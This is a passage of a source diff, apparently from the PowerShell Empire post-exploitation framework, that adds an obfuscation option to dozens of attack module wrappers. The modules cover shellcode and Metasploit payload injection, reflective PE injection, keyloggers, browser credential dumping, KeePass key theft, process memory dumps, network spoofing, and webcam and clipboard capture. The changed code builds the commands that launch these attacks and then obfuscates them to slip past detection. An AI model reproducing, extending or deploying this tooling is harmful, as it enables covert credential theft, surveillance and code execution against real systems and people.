return script

15
lib/modules/powershell/code_execution/invoke_metasploitpayload.py
View File

@ -45,9 +45,12 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-MetasploitPayload.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -58,15 +61,17 @@ class Module:
f.close()
script = moduleCode
script += "\nInvoke-MetasploitPayload"
scriptEnd = "\nInvoke-MetasploitPayload"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

18
lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py
View File

@ -83,11 +83,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-ReflectivePEInjection.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -99,7 +101,7 @@ class Module:
script = moduleCode
script += "\nInvoke-ReflectivePEInjection"
scriptEnd = "\nInvoke-ReflectivePEInjection"
#check if dllpath or PEUrl is set. Both are required params in their respective parameter sets.
if self.options['DllPath']['Value'] == "" and self.options['PEUrl']['Value'] == "":
@ -115,14 +117,16 @@ class Module:
f.close()
base64bytes = base64.b64encode(dllbytes)
script += " -PEbase64 " + str(base64bytes)
scriptEnd += " -PEbase64 " + str(base64bytes)
except:
print helpers.color("[!] Error in reading/encoding dll: " + str(values['Value']))
elif values['Value'].lower() == "true":
script += " -" + str(option)
scriptEnd += " -" + str(option)
elif values['Value'] and values['Value'] != '':
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

20
lib/modules/powershell/code_execution/invoke_shellcode.py
View File

@ -88,11 +88,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -104,7 +106,7 @@ class Module:
script = moduleCode
script += "\nInvoke-Shellcode -Force"
scriptEnd = "\nInvoke-Shellcode -Force"
listenerName = self.options['Listener']['Value']
if listenerName != "":
@ -133,14 +135,16 @@ class Module:
if values['Value'] and values['Value'] != '':
if option.lower() == "payload":
payload = "windows/meterpreter/" + str(values['Value'])
script += " -" + str(option) + " " + payload
scriptEnd += " -" + str(option) + " " + payload
elif option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values['Value'].split("\\"))[1:]
script += " -" + str(option) + " @(" + sc + ")"
scriptEnd += " -" + str(option) + " @(" + sc + ")"
else:
script += " -" + str(option) + " " + str(values['Value'])
script += "; 'Shellcode injected.'"
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += "; 'Shellcode injected.'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/code_execution/invoke_shellcodemsil.py
View File

@ -61,11 +61,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -77,7 +79,7 @@ class Module:
script = moduleCode
script += "Invoke-ShellcodeMSIL"
scriptEnd = "Invoke-ShellcodeMSIL"
for option,values in self.options.iteritems():
if option.lower() != "agent":
@ -85,6 +87,8 @@ class Module:
if option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values['Value'].split("\\"))[1:]
script += " -" + str(option) + " @(" + sc + ")"
scriptEnd += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

15
lib/modules/powershell/collection/ChromeDump.py
View File

@ -69,13 +69,16 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-ChromeDump.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -87,7 +90,7 @@ class Module:
script = moduleCode
script += " Get-ChromeDump"
scriptEnd = " Get-ChromeDump"
# add any arguments to the end execution of the script
@ -96,8 +99,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

15
lib/modules/powershell/collection/FoxDump.py
View File

@ -71,7 +71,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
@ -80,6 +80,9 @@ class Module:
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-FoxDump.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -91,7 +94,7 @@ class Module:
script = moduleCode
script += " Get-FoxDump"
scriptEnd = " Get-FoxDump"
# add any arguments to the end execution of the script
@ -100,8 +103,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/collection/USBKeylogger.py
View File

@ -50,11 +50,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-USBKeystrokes.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -66,15 +68,17 @@ class Module:
script = moduleCode
script += "Get-USBKeystrokes "
scriptEnd = "Get-USBKeystrokes "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

5
lib/modules/powershell/collection/WebcamRecorder.py
View File

@ -76,7 +76,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# the PowerShell script itself, with the command to invoke
# for execution appended to the end. Scripts should output
@ -215,5 +215,6 @@ Start-WebcamRecorder"""
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

18
lib/modules/powershell/collection/browser_data.py
View File

@ -70,13 +70,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-BrowserData.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -89,16 +91,18 @@ class Module:
# get just the code needed for the specified function
script = moduleCode
script += "\nGet-BrowserInformation "
scriptEnd = "\nGet-BrowserInformation "
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/collection/clipboard_monitor.py
View File

@ -60,11 +60,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-ClipboardContents.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -76,15 +78,17 @@ class Module:
script = moduleCode
script += "Get-ClipboardContents"
scriptEnd = "Get-ClipboardContents"
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

7
lib/modules/powershell/collection/file_finder.py
View File

@ -130,13 +130,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
@ -161,5 +161,6 @@ class Module:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

5
lib/modules/powershell/collection/find_interesting_file.py
View File

@ -95,7 +95,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
@ -126,5 +126,6 @@ class Module:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

18
lib/modules/powershell/collection/get_indexed_item.py
View File

@ -59,7 +59,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-IndexedItem.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -71,19 +73,21 @@ class Module:
script = moduleCode
script += "Get-IndexedItem "
scriptEnd = "Get-IndexedItem "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
# extract the fields we want
script += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY"
script += " | fl | Out-String;"
scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY"
scriptEnd += " | fl | Out-String;"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

18
lib/modules/powershell/collection/inveigh.py
View File

@ -185,11 +185,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-Inveigh.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -202,19 +204,21 @@ class Module:
script = moduleCode
# set defaults for Empire
script += "\n" + 'Invoke-Inveigh -Tool "2" '
scriptEnd = "\n" + 'Invoke-Inveigh -Tool "2" '
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
if "," in str(values['Value']):
quoted = '"' + str(values['Value']).replace(',', '","') + '"'
script += " -" + str(option) + " " + quoted
scriptEnd += " -" + str(option) + " " + quoted
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

18
lib/modules/powershell/collection/inveigh_bruteforce.py
View File

@ -142,11 +142,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-InveighBruteForce.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -159,19 +161,21 @@ class Module:
script = moduleCode
# set defaults for Empire
script += "\n" + 'Invoke-InveighBruteForce -Tool "2" '
scriptEnd = "\n" + 'Invoke-InveighBruteForce -Tool "2" '
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
if "," in str(values['Value']):
quoted = '"' + str(values['Value']).replace(',', '","') + '"'
script += " -" + str(option) + " " + quoted
scriptEnd += " -" + str(option) + " " + quoted
else:
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

12
lib/modules/powershell/collection/keylogger.py
View File

@ -50,7 +50,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-Keystrokes.ps1"
@ -66,15 +66,17 @@ class Module:
script = moduleCode
script += "Get-Keystrokes "
scriptEnd = "Get-Keystrokes "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

18
lib/modules/powershell/collection/minidump.py
View File

@ -65,11 +65,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Out-Minidump.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -80,18 +82,22 @@ class Module:
f.close()
script = moduleCode
scriptEnd = ""
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if option == "ProcessName":
script += "Get-Process " + values['Value'] + " | Out-Minidump"
scriptEnd += "Get-Process " + values['Value'] + " | Out-Minidump"
elif option == "ProcessId":
script += "Get-Process -Id " + values['Value'] + " | Out-Minidump"
scriptEnd += "Get-Process -Id " + values['Value'] + " | Out-Minidump"
for option,values in self.options.iteritems():
if values['Value'] and values['Value'] != '':
if option != "Agent" and option != "ProcessName" and option != "ProcessId":
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

20
lib/modules/powershell/collection/netripper.py
View File

@ -83,11 +83,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-NetRipper.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -99,20 +101,22 @@ class Module:
script = moduleCode
script += "Invoke-NetRipper "
scriptEnd = "Invoke-NetRipper "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if option.lower() == "searchstrings":
script += " -" + str(option) + " \"" + str(values['Value']) + "\""
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
else:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
script += ";'Invoke-NetRipper completed.'"
scriptEnd += ";'Invoke-NetRipper completed.'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

18
lib/modules/powershell/collection/ninjacopy.py
View File

@ -72,11 +72,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-NinjaCopy.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -88,17 +90,19 @@ class Module:
script = moduleCode
script += "$null = Invoke-NinjaCopy "
scriptEnd = "$null = Invoke-NinjaCopy "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
script += "; Write-Output 'Invoke-NinjaCopy Completed'"
scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

5
lib/modules/powershell/collection/packet_capture.py
View File

@ -71,7 +71,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
maxSize = self.options['MaxSize']['Value']
traceFile = self.options['TraceFile']['Value']
@ -89,5 +89,6 @@ class Module:
if persistent != "":
script += " persistent=yes"
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

5
lib/modules/powershell/collection/prompt.py
View File

@ -67,7 +67,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
# Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
@ -119,5 +119,6 @@ Invoke-Prompt """
script += " -" + str(option)
else:
script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

5
lib/modules/powershell/collection/screenshot.py
View File

@ -56,7 +56,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Get-Screenshot
@ -114,5 +114,6 @@ Get-Screenshot"""
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

22
lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py
View File

@ -80,13 +80,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -100,20 +102,22 @@ class Module:
script = moduleCode
# kill all KeePass instances first
script += "\nGet-Process *keepass* | Stop-Process -Force"
scriptEnd = "\nGet-Process *keepass* | Stop-Process -Force"
script += "\nFind-KeePassconfig | Add-KeePassConfigTrigger "
scriptEnd += "\nFind-KeePassconfig | Add-KeePassConfigTrigger "
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
script += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/collection/vaults/find_keepass_config.py
View File

@ -65,13 +65,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -84,8 +86,10 @@ class Module:
# get just the code needed for the specified function
script = moduleCode
script += "\nFind-KeePassconfig "
script += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd = "\nFind-KeePassconfig "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py
View File

@ -65,13 +65,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -84,8 +86,10 @@ class Module:
# get just the code needed for the specified function
script = moduleCode
script += "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
script += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd = "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

14
lib/modules/powershell/collection/vaults/keethief.py
View File

@ -65,13 +65,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeeThief.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -84,8 +86,10 @@ class Module:
# get just the code needed for the specified function
script = moduleCode
script += "\nGet-KeePassDatabaseKey "
script += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd = "\nGet-KeePassDatabaseKey "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py
View File

@ -65,13 +65,15 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -85,9 +87,11 @@ class Module:
script = moduleCode
# kill all KeePass instances first
script += "\nGet-Process *keepass* | Stop-Process -Force"
script += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger "
script += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd = "\nGet-Process *keepass* | Stop-Process -Force"
scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/credentials/credential_injection.py
View File

@ -93,11 +93,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
